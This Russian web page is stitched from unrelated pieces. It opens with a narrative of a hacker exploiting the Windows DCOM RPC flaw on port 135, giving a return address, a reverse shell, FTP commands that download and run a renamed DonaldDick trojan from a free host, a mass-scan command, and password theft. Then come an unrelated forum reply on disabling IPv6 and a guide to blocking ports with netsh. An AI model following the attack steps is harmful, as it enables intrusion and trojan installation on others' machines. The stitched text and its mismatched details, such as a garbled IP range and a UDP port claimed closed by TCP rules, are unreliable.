• Основы сетевых портов. Как закрыть порты Windows Как закрыть 135 порт

    07.11.2021

    Уязвимость была устрашающей, правда
    готовый эксплоит оказался недоступен для
    основной массы людей... Наверное поэтому
    никто не чувствовал страха...

    Группа польских экспертов в области
    безопасности компьютерных технологий "Last
    Stage of Delirium" сообщила публике о найденной
    ими уязвимости, обработки DCOM объектов в
    контексте RPC протокола. Это было чем-то
    потрясающим, поскольку данный протокол
    использовался практически всеми
    существующими на этот момент версиями Windows.
    Уязвимыми оказались ОС Windows NT, Windows XP, Windows 2000
    и даже Windows Server 2003 был под прицелом. Этого
    было более чем достаточно, чтобы завладеть
    компьютерами большинства пользователей
    сети Internet. Более того, многие серверы не
    блокировали входящие пакеты на 135 порт,
    именно он использовался для атаки. Что
    делало их потенциальными жертвами.

    Но спустя несколько часов Todd Sabin сообщает,
    что уязвимыми являются все сервисы RPC. Это
    значит, что настройка брандмауэра на
    блокировку 135 порта является не достаточным
    средством защиты. Опасности подвергаются
    компьютеры с открытыми 135 (UDP/TCP), 139, 445 и 593
    портами. СМИ освещают данную ошибку, как
    потенциальную угрозу для безопасности
    пользователей Windows. Дело шло к глобальной
    катастрофе. Но поскольку публичного
    эксплоита выпущено не было, все продолжали
    жить своей прежней жизнью не задумываясь о
    последствиях его появления в массах.

    Но не все так пассивно отреагировали на
    появление данной уязвимости. Хакеры
    понемногу начинали писать приватные
    эксплоиты, а script kids продолжали ждать его
    появления. Результат не заставил себя долго
    ждать. В течении нескольких дней появляются
    некоторые наработки в этой области,
    появляются первые эксплоиты. Тем не менее
    большинство из них просто провоцирует сбой
    на удаленной системе. Что можно объяснить,
    поскольку технических деталей по поводу
    найденной уязвимости известно не было. Хотя
    некоторые версии ОС уже успешно
    эксплуатировались.

    Этот день стал переломным в истории
    эксплуатации данной уязвимости. Наконец
    появляется техническое описание проблемы.
    После чего рождается большое количество
    эксплоитов, под разные версии Windows.
    Некоторые из них имеют даже графический
    интерфейс, а иногда и функцию сканирования
    определенного диапазона IP адресов.

    Именно в этот момент началась массивная
    атака хакеров на рядовых пользователей.
    Более того, появился интернет червь MS Blast,
    который с легкостью проникал на компьютеры
    подключенные к Интернету и даже в
    корпоративные сети крупнейших компаний
    мира. В опасности оказались все...

    Напасть на удаленную машину не составляет
    особого труда. Поэтому script kids взялись за
    свое дело. Кража кредитных кард и приватных
    эксплоитов возросла в несколько раз. И
    многие лакомые сегменты сети стали
    пробоваться на вкус. Именно этим занялся
    один хакер. Он давно хотел захватить сервер,
    но приличной уязвимости под него до этого
    не было. А не воспользоваться таким
    подарком судьбы он просто не мог.

    Пьеса в три акта

    Первое, что пришлось ему сделать перед
    атакой, это проверить какая именно
    операционная система установлена на
    сервере. Для этого он воспользовался
    утилитой nmap. Хакер не раз уже писал о ее
    возможностях, но я повторюсь и скажу, что
    она используется для определения версии ОС
    на удаленном компьютере. Благо она
    существует как для Windows, так и для *nix. А
    поскольку хакер для своей работы
    использовал Windows, то его выбор пал на
    графический вариант nmap.

    Несколько минут работы сканера и
    результат позитивный. 135 порт оказался
    открытым и не защищенным брандмауэром. Это
    было началом конца, началом долгожданной
    атаки. На этот момент уже было написано
    много эксплоитов, в том числе и "RCP Exploit GUI #2".
    Его отличительной чертой было то, что он
    имел графический интерфейс и содержал в
    себе встроенные функции сканирования
    диапазона IP, а также FTP сервер.

    Запустив эксплоит, он указал адрес
    целевого компьютера. Но в списке ОС для
    атакуемых машин Windows NT указан не был. А ведь
    именно она была установлена на сервере. Это
    серьезная проблема, поскольку чтобы
    запустить эксплоит необходимо знать его
    точный адрес в памяти, чтобы потом передать
    на него управление. Немного покопавшись в
    файлах, скачанных вместе с эксплоитом он
    нашел небольшой список адресов под широкую
    разновидность линейки Windows. Среди них
    присутствовал и Windows NT с предустановленным
    Service Pack 4. Именно его значение он указал в
    качестве адреса возврата, плюнув на ручной
    выбор ОС. Число 0xE527F377 стало его тайным
    пропуском в жизнь сервера. И он начал атаку.

    Система сдалась без каких-либо
    происшествий, так у хакера появился reverse-shell
    с удаленным сервером. Теперь, когда он мог
    исполнять на нем все что угодно, пришло
    время установить Троян. Среди большого
    числа возможных, был выбран DonaldDick. Для
    осуществления своего плана ему пришлось
    получить хостинг на бесплатном сервере с
    поддержкой FTP. Вполне подошел BY.RU, именно
    туда он и закачал сервер для трояна. Теперь,
    когда DonaldDick стал доступным по FTP, он обратно
    взялся за жертву, а точнее начал закачивать
    на нее сервер трояна. Это был хорошо
    продуманный план, поскольку уязвимость
    могли пропатчить, а троян он и в Африке
    троян. Набрав в консоли ftp он принялся
    закачивать файл. Весь процесс занял у него,
    написания всего лишь пяти строк:

    open by.ru
    имя_сервера.by.ru
    пароль
    get fooware.exe
    bye

    Где fooware.exe это переименованный сервер для
    DonaldDick. Когда файл закачался, ему осталось
    только запустить его. Для этого он просто
    написал имя файла (fooware.exe) и с наслаждением
    нажал Enter... После чего хакер получил удобный
    контроль над сервером.

    Но знаете как оно всегда бывает, когда
    находишь что-то интересное продолжаешь с
    этим играть. Так и наш Хакер захотел
    получить более чем одну систему. Посмотрев,
    что эксплоит позволяет провести массивное
    сканирование, он взялся за работу, а точнее
    за работу взялся KaHt. Его использование
    оказалось не трудным. Так например, чтобы
    про сканировать сеть с IP 192.168.0.* (класс С), ему
    нужно было набрать "KaHt.exe 129.168.0.1
    192.168.0.254". Что собственно он и сделал,
    после чего периодически проверял
    результаты. Таким образом он получил доступ
    к еще большему количеству пользователей, от
    которых потом сумел получить пароли на
    разные сервисы, почты, и много другой
    полезной информации. Не говоря уже про то,
    что он стал пользоваться многими из них как
    анонимными прокси.

    Пища к размышлению

    Хотя Microsoft давно выпустила заплатку,
    пользователи и админы не спешат
    устанавливать патчи, надеясь что их сеть не
    будет никому интересной. Но таких хакеров
    большое количество и установка патча это
    скорее необходимость, нежели возможность.
    Еще можно блокировать все входящие пакеты
    на 135, 139, 445 и 593 порты.

    Естественно, что все это хакер делал через
    анонимную прокси, а в результате почистил
    за собой следы присутствия в системе. Но вам
    следует задуматься, прежде чем повторять
    его подвиги. Ведь такие действия считаются
    противозаконными и могут закончиться для
    вас достаточно плачевно...

    Кровный , то, что у вас фаервол показывает, что svchost.exe слушает данный порт, ещё не означает, что он открыт для подключения извне.

    Правила у вас вроде бы прописаны и должны работать.

    Вы сканерами портов пробовали проверять? - ЦОБ (Центр Обеспечения Безопасности) (п.2.7)

    И не забудьте о том, что ещё надо будет проверить IPv6, т.к. он у вас в системе включен, а вот сканеры обычно проверяют только IPv4 (я про централизованные сервисы).

    Если данный протокол вам вообще не нужен, тогда его можно отключить:

    Чтобы отключить компоненты IP версии 6 в Windows Vista, выполните указанные ниже действия.

    1. Нажмите кнопку Пуск, введите regedit в поле Начать поиск, затем выберите regedit.exe в списке Программы.

    2. В диалоговом окне Контроль учетных записей пользователей нажмите кнопку Продолжить.

    3. Найдите и выберите следующий подраздел реестра:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\

    4. Дважды щелкните пункт DisabledComponents для изменения параметра DisabledComponents.

    Примечание. Если параметр DisabledComponents недоступен, его необходимо создать. Для этого выполните указанные ниже действия.

    1. В меню Правка выберите пункт Создать, а затем - Параметр DWORD (32 бита).

    2. Введите DisabledComponents и нажмите клавишу ВВОД.

    3. Дважды щелкните пункт DisabledComponents.

    5. Введите любое из указанных ниже значений для настройки протокола IP версии 6, а затем нажмите кнопку ОК.

    1. Введите 0, чтобы включить все компоненты IP версии 6.

    Примечание. Значение "0" используется по умолчанию.

    2. Введите 0xffffffff, чтобы отключить все компоненты IP версии 6, кроме интерфейса замыкания на себя. При этом значении Windows Vista также будет использовать в политиках префиксов протокол IP версии 4 вместо IPv6.

    3. Введите 0x20, чтобы использовать в политиках префикса IP версии 4 вместо IP версии 6.

    4. Введите 0x10, чтобы отключить собственные интерфейсы IP версии 6.

    5. Введите 0x01, чтобы отключить все туннельные интерфейсы IP версии 6.

    6. Введите 0x11, чтобы отключить все интерфейсы IP версии 6, кроме интерфейса замыкания на себя.

    Примечания

    * Использования других значений (кроме 0x0 или 0x20) может вызвать сбой в работе службы маршрутизации и удаленного доступа.

    * Чтобы изменения вступили в силу, необходимо перезагрузить компьютер.

    Информация в данной статье относится к следующим продуктам.

    * Windows Vista Enterprise

    * Windows Vista Enterprise 64-bit edition

    * Windows Vista Home Basic 64-bit edition

    * Windows Vista Home Premium 64-bit edition

    * Windows Vista Ultimate 64-bit edition

    * Windows Vista Business

    * Windows Vista Business 64-bit edition

    * Windows Vista Home Basic

    * Windows Vista Home Premium

    * Windows Vista Starter

    * Windows Vista Ultimate

    * Windows 7 Enterprise

    * Windows 7 Home Basic

    * Windows 7 Home Premium

    * Windows 7 Professional

    * Windows 7 Ultimate

    * Windows Server 2008 R2 Datacenter

    * Windows Server 2008 R2 Enterprise

    * Windows Server 2008 R2 Standard

    * Windows Server 2008 Datacenter

    * Windows Server 2008 Enterprise

    * Windows Server 2008 Standard

    Источник - http://support.microsoft.com/kb/929852

    После отключения и перезагрузки у вас из списка, получаемого командой ipconfig /all исчезнет куча лишних строк и останутся только хорошо известные вам интерфейсы.

    Обратное включение выполняется простым удалением созданного ключа из реестра или заменой значения на "0" с последующей перезагрузкой.

    Каждый день владельцы ПК сталкиваются с огромным количеством опасных программ и вирусов, которые так или иначе попадают на жесткий диск и становятся причиной утечки важных данных, поломки компьютера, кражи важной информации и других неприятных ситуаций.

    Чаще всего заражаются компьютеры, работающие на ОС Windows любых версий, будь то 7, 8, 10 или любая другая. Главная причина такой статистики – входящие подключения к ПК или «порты», которые являются слабым местом любой системы из-за своей доступности по умолчанию.

    Слово «порт» – это термин, подразумевающий порядковый номер входящих подключений, которые направляются на ваш ПК от внешнего программного обеспечения. Часто бывает так, что эти порты используют вирусы, запросто проникающие на ваш компьютер при помощи IP-сети.

    Вирусное программное обеспечение, попав в компьютер через такие входящие подключения, быстро заражает все важные файлы, причём не только пользовательские, но и системные. Чтобы этого избежать, мы рекомендуем закрыть все стандартные порты, которые могут стать вашим уязвимым местом при атаке хакеров.

    Какие порты у Windows 7-10 самые уязвимые?

    Многочисленные исследования и опросы специалистов показывают, что до 80% вредоносных атак и взломов происходили при помощи четырех основных портов, использующихся для быстрого обмена файлами между разными версиями Windows:

    • TCP порт 139, необходимый для удаленного подключения и управления ПК;
    • TCP порт 135, предназначенный для выполнения команд;
    • TCP порт 445, позволяющий быстро передавать файлы;
    • UDP порт 137, с помощью которого проводится быстрый поиск на ПК.

    Закрываем порты 135-139 и 445 в Виндовс

    Мы предлагаем вам ознакомиться с самыми простыми способами закрытия портов Виндовс, которые не требуют дополнительных знаний и профессиональных навыков.

    Используем командную строку

    Командная строка Windows – это программная оболочка, которая используется для задания определенных функций и параметров софту, не имеющему собственной графической оболочки.

    Для того чтобы запустить командную строку, необходимо:

    1. Одновременно нажать сочетание клавиш Win+R
    2. В появившейся командной строке ввести CMD
    3. Нажать на кнопку «ОК»

    Появится рабочее окно с чёрным фоном, в котором необходимо поочередно вводить нижеприведенные команды. После каждой введенной строчки нажимайте клавишу Enter для подтверждения действия.
    netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name=»Block1_TCP-135″ (команда для закрытия порта 135)
    netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name=»Block1_TCP-137″ (команда для закрытия порта 137)
    netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name=»Block1_TCP-138″ (команда для закрытия порта 138)
    netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name=»Block_TCP-139″ (команда для закрытия порта 139)
    netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name=»Block_TCP-445″ (команда для закрытия порта 445)
    netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name=»Block_TCP-5000″

    Шесть приведенных нами команд необходимы для: закрытия 4х уязвимых TCP-портов Windows (открытых по умолчанию), закрытия UDP-порта 138, а также закрытия порта 5000, который отвечает за выведение списка доступных сервисов.

    Закрываем порты сторонними программами

    Если вы не хотите тратить время на работу с командной строкой, мы предлагаем вам ознакомиться со сторонними приложениями. Суть такого софта заключается в правке реестра в автоматическом режиме с графическим интерфейсом, без необходимости в ручном введении команд.

    По мнению наших пользователей, самой популярной программой для этих целей является Windows Doors Cleaner. Она поможет с лёгкостью закрыть порты на компьютере с ОС Windows 7/8/8.1/10. Более старые версии операционных систем, к сожалению, не поддерживаются.

    Как работать с программой, закрывающей порты

    Для того чтобы воспользоваться Windows Doors Cleaner, необходимо:

    1. Скачать софт и установить его
    2. Запустить программу, нажав на ярлык правой кнопкой мыши и выбрав «запустить от имени администратора»
    3. В появившемся рабочем окне будет список портов и кнопки «Сlose» или «Disable», которые закрывают уязвимые порты Windows, а также любые другие по желанию
    4. После того, как необходимые изменения были внесены, необходимо перезагрузить систему

    Ещё одним преимуществом программы является тот факт, что порты с её помощью можно не только закрывать, но и открывать.

    Делаем выводы

    Закрытие уязвимых сетевых портов в Виндовс – это не панацея от всех бед. Важно помнить, что сетевая безопасность может быть достигнута только комплексными действиями, нацеленными на закрытие всех уязвимостей вашего ПК.

    Для безопасности Windows пользователь в обязательном порядке должен устанавливать критические обновления от Microsoft, иметь лицензированных антивирусный софт и включенный файервол, использовать исключительно безопасное программное обеспечение и регулярно читать наши статьи, в которых рассказываем обо всех существующих способах достижения анонимности и безопасности ваших данных.

    Вы знаете более удобные способы закрыть сетевые порты? Поделитесь своими знаниями в комментариях и не забывайте репостить статью к себе на страничку. Делитесь полезной информацией со своими друзьями и не дайте хакерам шанса навредить вашим близким!

    Похожие статьи